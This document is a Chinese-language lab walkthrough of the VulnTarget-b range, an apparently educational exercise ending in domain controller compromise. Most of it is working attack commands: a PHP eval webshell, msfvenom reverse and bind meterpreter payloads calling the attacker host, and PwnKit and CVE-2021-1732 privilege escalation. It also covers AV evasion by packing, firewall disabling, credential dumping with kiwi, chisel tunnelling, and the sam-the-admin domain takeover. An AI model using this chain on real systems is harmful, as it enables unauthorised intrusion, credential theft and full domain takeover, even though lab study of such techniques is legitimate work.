VulnTarget-b

实验目标：拿下域控中的flag.txt
学习目标：极致CMS相关漏洞/禅道CMS相关漏洞/隧道代理/免杀/CVE-2021-1732/CVE-2021-42287/CVE-2021-42278
靶机下载：其中vulntarget-b为本次实验机器

百度云：
链接: https://pan.baidu.com/s/1p3GDd7V3Unmq3-wSAvl7_Q 提取码:1p9p

》》》靶机信息《《《

#攻击机
OS:Kali 2022.2
外NIC:192.168.x.x   (桥接模式)(与Centos-7主机进行通信)

#Web Server
OS:Centos 7
Server:极致CMS/宝塔
username:root/vulntarget
password:root
外NIC:192.168.x.x     (桥接模式)(与Kali通信)
内NIC:10.0.20.30 (仅主机模式)(与内网Win10主机即域成员进行通信)

#域成员-Win10
OS:Windows 10
Server:禅道CMS/火绒
本地账户：
win10:win10#123
administrator:admin@123
域成员：
vulntarget\win101:admin#123
Web后台：
admin:Admin123
内NIC：10.0.20.66     (仅主机模式)(与Centos 7即WEB主机进行通信)
内NIC：10.0.10.99    (仅主机模式)(与Win2016即域控通信)

#域控-Wins16
OS:Windows Server 2016
Server:AD DC
username:vulntarget\administrator	
password:Admin@123
内网NIC：10.0.10.100    (仅主机模式)(与Win2016即域内成员通信)(能够Ping通Win2016主机)

一：边界主机

步骤一：在边界主机中登录并修改网卡配置文件ifcfg-ens33将其中IP地址信息改为与桥网络同一网段的IP地址

#编辑配置文件
vi /etc/sysconfig/network-scripts/ifcfg-ens33
#修改内容信息(能够与攻击机相互通信)
IPADDR=192.168.50.106          //修改
NETMASK=255.255.255.0      //修改
GATEWAY=192.168.50.1        //修改

0x00：信息收集

步骤二：使用Nmap对目标主机进行扫描…发现开放:21/22/80/81/888/3306/8888等端口…

nmap -sT -Pn 192.168.50.106

步骤三：访问后发现80为宝塔默认页面/81为极致CMS站点/8888为宝塔登录入口…下一步从极致CMS站点入手…


步骤四：使用Dirb扫描目标敏感目录…发现后台登录与版本信息…

#扫描命令
dirb http://192.168.50.106:81/
#扫描信息
http://192.168.50.106:81/admin.php/Login/index.html   //后台登录
http://192.168.50.106:81/readme.txt                   //版本信息
http://192.168.50.106:81/robots.txt                   //敏感目录

0x01：漏洞利用

步骤五：根据以上扫描收集到的信息搜索该极致CMS Beta1.8.1的漏洞发现存在后台GetShell…尝试使用BP进行爆破，测试验证存在验证码复用且爆破结果为默认用户密码admin:admin123进行登录，成功…


步骤六：开始后台GetShell，点击扩展管理–>插件列表–>找到在线编辑模板–>下载–>安装–>配置–>输入账户密码–>点击立即提交–>跳转到在线文件管理工具–>登录即可



步骤七：在在线文件管理器中新建文件并写入一句话木马，测试访问并用蚁剑链接…

0x02：绕过disable_functions

步骤八：在Shell中执行命令时返回ret=127可能是宝塔禁用了命令执行的函数，这里使用蚁剑的插件进行绕过执行命令…测试发现还是有些命令执行不了…



步骤九：进行简要的信息收集…发现存在通往内网的网卡且当前权限为低权限需要提全…

#收集命令
id
whoami
uname -a
/sbin/ifconfig
cat /etc/passwd
#收集信息
低权限用户:www
可用用户：root/vulntarget
网卡信息：192.168.50.106/10.0.20.30

步骤十：使用MSF生成后门并上传到蚁剑中执行，进行反弹Shell…

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.50.46 LPORT=1234 -f elf -o outside.elf

msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.50.46
set lport 1234
show options
run

0x03：权限提升

步骤十一：使用以下模块查找可提权的漏洞…这里直接使用cve_2021_4034_pwnkit_lpe_pkexec进行提权限

run post/multi/recon/local_exploit_suggester

步骤十二：执行以下命令来进行提权…即可获取到最高权限root

#执行命令
bg
use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
set session 1
run
#注意事项
1.在云主机上的MSF一定要设置好Payload，且其中的LHOST为外网地址才能正常返回高权限的Shell

步骤十四：进入到Shell中获取到Flag…

vulntarget{get-one-centos-privilage-promotion}

二：域内主机

0x00：内网信息收集

步骤一：在MSF中查看路由信息并添加路由…

run post/multi/manage/autoroute  #添加路由
run autoroute -p    #查看路由

步骤二：使用MSF的PortScan模块对内网进行主机存活及端口开放扫描…发现内网10.0.20.66开放8080端口

use auxiliary/scanner/portscan/tcp
set rhost 10.0.20.0/24
set ports 21,22,80,135,139,445,8080
set threads 30
run

步骤三：上传fscan到蚁剑并执行以下命令，发现10.0.20.66主机为存活且开放3306/8080端口…

#项目地址
https://github.com/shadow1ng/fscan
#执行命令
./fscan_amd64 -h 10.0.20.0/24 -np   #-np   禁ping扫描

步骤四：这里使用chisel进行流量代理的搭建…这里搭建反向流量代理…使用浏览器测试访问内网站点…

#项目地址
https://github.com/jpillora/chisel
#Kali执行命令
./chisel server -p 50050 --reverse
#边界主机执行命令
./chisel client 192.168.50.46:50050 R:socks
#代理配置
127.0.0.1 1080 socks5

0x01：内网Web攻击

步骤五：访问以下地址可获取该CMS的版本…在网络上搜索该禅道CMS系统的漏洞，发现存在CNVD-C-2020-121325漏洞，直接复现！！！

http://10.0.20.66:8080/index.php?mode=getconfig

步骤六：先尝试弱口令登录，尝试几次后处罚防护机制故取出使用BP爆破的思路，尝试在边界主机上爆破的账号密码admin:Admin123即可登录成功…

步骤七：在边界主机上写入一句话木马并开启HTTP服务器对内网主机提供下载…并将提供出来一句话木马下载地址进行base64编码…

#将木马写入到第一层的centos机器中
echo "<?php @eval(\$_POST['cmd']); ?> " >1.php    #$前加一个反斜杠转义
#开启python的http服务
python -c 'import pty; pty.spawn("/bin/bash")'  //交互式
python -m SimpleHTTPServer 4567
python -m SimpleHTTPServer 7089
#base64编码
HTTP://10.0.20.33:4567/1.php
SFRUUDovLzEwLjAuMjAuMzM6NDU2Ny8xLnBocA==

步骤八：进行GetShell，将以上步骤得到base64编码值放到link参数后面下载后门文件，访问特定地址即可获取到Shell地址…蚁剑链接访问…

#漏洞利用
http://10.0.20.66:8080/index.php?m=client&f=download&version=1&link=SFRUUDovLzEwLjAuMjAuMzM6NDU2Ny8xLnBocA==
#Shell地址
http://10.0.20.66:8080/data/client/1/1.php

步骤九：执行以下命令进行信息收集…

#whoami /priv
iis apppool\zentao

#system
OS:Windows 10 18363 专业版

#ipconfig
NIC1:10.0.20.66
NIC2:10.0.10.99

#systeminfo
#net time /domain
域：vulntarget.com
域控IP：10.0.10.100

#tasklist /svc
火绒/windows defender

#查看防火墙状态
netsh advfirewall show allprofile state   
#关闭防火墙
netsh advfirewall set  allprofile state off

步骤十：通过以上信息判断为低权限且为域内主机，在MSF上生成正向链接木马加壳并在蚁剑运行上线…

msfvenom -p windows/x64/meterpreter/bind_tcp  LPORT=6061 -f exe > inside.exe

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 6061
set Rhost 10.0.20.66
run

加壳免杀：http://www.ucbug.com/soft/33605.html

0x02：内网Web提权

步骤十一：在MSF中使用以下模块搜索漏洞利用模块进行提权…未果在公网上搜索相关提权漏洞…

meterpreter > run post/multi/recon/local_exploit_suggester

步骤十二：在公网找到CVE-2021-1732针对于Windows 10的提权漏洞…Github上寻找并在下载放置到蚁剑中执行测试…这里同样需要加壳绕过火绒…

#提权项目
源项目地址：https://github.com/shanfenglan/test/blob/master/cve-2021-1732.exe
备份地址：https://github.com/sukusec301/test/blob/master/cve-2021-1732.exe
#使用方式
cve-2021-1732.exe whoami

步骤十三：使用MSF生成正向连接马并加壳，开启MSF监听并执行以下命令就能上线System权限的Shell…

msfvenom -p windows/x64/meterpreter/bind_tcp  LPORT=6062 -f exe > i2side.exe

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 6062
set rhost 10.0.20.66
run

cve-2021-1732_se.exe i2side_se.exe

步骤十四：尝试抓取密码…只抓取到了域成员是win101账户的NTLM Hash解密得到密码admin#123；添加路由信息…

#抓取密码
load kiwi
cerds_all
kiwi_cmd sekurlsa::logonpasswords
#添加路由
run post/multi/manage/autoroute  //添加路由
run autoroute -p                 //查看路由

三：域控服务

0x00：域内信息收集

步骤一：使用scaninfo扫描内部存活主机…发现存活主机10.0.10.100且扫描出主机账号密码信息…

#项目地址
https://github.com/redtoolskobe/scaninfo
#使用方法
scaninfo_windows_x64.exe -i 10.0.10.0/24

步骤二：也可使用MSF的Portscan模块对目标进行端口扫描…

use auxiliary/scanner/portscan/tcp
set rhost 10.0.10.100
set ports 21,22,80,135,139,445,8080
set threads 30
run

步骤三：使用最近的CVE-2021-42287/CVE-2021-42278漏洞来获取域控权限…配置代理与proxychains信息

#代理配置
use auxiliary/server/socks_proxy   
show options   
run
jobs
#proxychains配置
vi /etc/proxychains4.conf
socks5 127.0.0.1 1081
#链接测试
proxychains nmap -Pn -p 110 -sT 10.0.10.110

0x01：域控服务攻击

步骤四：编辑本地Host文件修改域名信息并下载漏洞攻击项目到本地…使用Python脚本并按照以下格式攻击即可获取到域控的Shell…

#vi /etc/hosts
10.0.10.100 vulntarget.com
#漏洞项目下载
https://github.com/WazeHell/sam-the-admin
#漏洞攻击使用
proxychains python3 sam_the_admin.py "域名/域用户:用户密码" -dc-ip 域控IP -shell
proxychains python3 sam_the_admin.py "vulntarget.com/win101:admin#123" -dc-ip 10.0.10.100 -shell

步骤五：进入到域控管理员的家目录发现flag.txt…查看内容为如下

再次恭喜拿下域控 +_+

打印机漏洞,CVE-2021-42287/CVE-2021-42278 域内提权 GET

vulntarget{domain-continue}

参考链接：

https://blog.csdn.net/zhangge3663/article/details/116430637/
https://blog.csdn.net/qq_36197704/article/details/109385695
https://blog.csdn.net/kelenwait/article/details/117676942
https://cloud.tencent.com/developer/article/1928565
https://cloud.tencent.com/developer/article/1926625
https://zhuanlan.zhihu.com/p/360149991